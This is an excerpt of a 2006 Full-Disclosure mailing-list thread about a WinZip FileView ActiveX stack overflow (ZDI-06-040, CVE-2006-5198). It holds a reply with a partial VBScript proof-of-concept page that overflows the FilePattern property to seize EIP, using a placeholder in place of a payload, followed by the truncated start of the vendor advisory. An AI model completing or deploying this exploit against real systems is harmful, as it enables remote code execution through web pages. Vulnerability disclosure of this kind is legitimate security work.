Re: [Full-disclosure] ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability

2006-11-14 Thread Micheal Turner
7245 correctly resolves this issue; standard stack overflow in WZFILEVIEW.FilePattern snatching EIP; PoC below;

<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<SCRIPT LANGUAGE=VBScript>
<!--
Sub WZFILEVIEW_OnAfterItemAdd(Item)
WZFILEVIEW.FilePattern = SMASHTHESTACKHERE
end sub
-->
</SCRIPT>
<OBJECT

ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability

2006-11-14 Thread zdi-disclosures
ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-040.html
November 14, 2006

-- CVE ID: CVE-2006-5198
-- Affected Vendor: WinZip
-- Affected Products: WinZip 10.0 (pre build 7245)
-- TippingPoint(TM